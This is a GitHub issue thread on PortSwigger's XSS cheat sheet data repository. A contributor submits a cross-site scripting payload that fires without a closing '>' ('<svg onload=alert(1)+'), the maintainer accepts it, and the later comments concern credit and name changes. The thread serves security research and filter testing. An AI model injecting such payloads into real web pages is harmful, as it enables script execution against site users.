### ISSUE TITLE
XSS Without ">"

### ISSUE THREAD

**Issue by Rando111111** [PortSwigger/xss-cheatsheet-data#24]
XSS Without ">"

<svg onload=alert(1)+

<opening_tag>PAYLOAD</closing_tag>

**Comment by hackvertor** [comment]
Thanks this has been added. The cheat sheet will be updated soon.

**Comment by Rando111111** [comment]
Hi Gareth Heyes,

Can you add to credits?

URL: https://twitter.com/Rando02355205
Name: R,ando

Thanks, Regards

Pada tanggal Sel, 29 Jun 2021 pukul 17.15 Gareth Heyes <
***@***.***> menulis:

**Comment by hackvertor** [comment]
Yep will do

**Comment by Rando111111** [comment]
Thank you!

Pada tanggal Rab, 30 Jun 2021 pukul 02.42 Gareth Heyes <
***@***.***> menulis:

**Comment by alessandrorumampuk** [comment]
Hi Gareth,

Could you please remove the second name **Rando111111** from the XSS Cheat Sheet page and change the first to **Alessandro Rumampuk**?
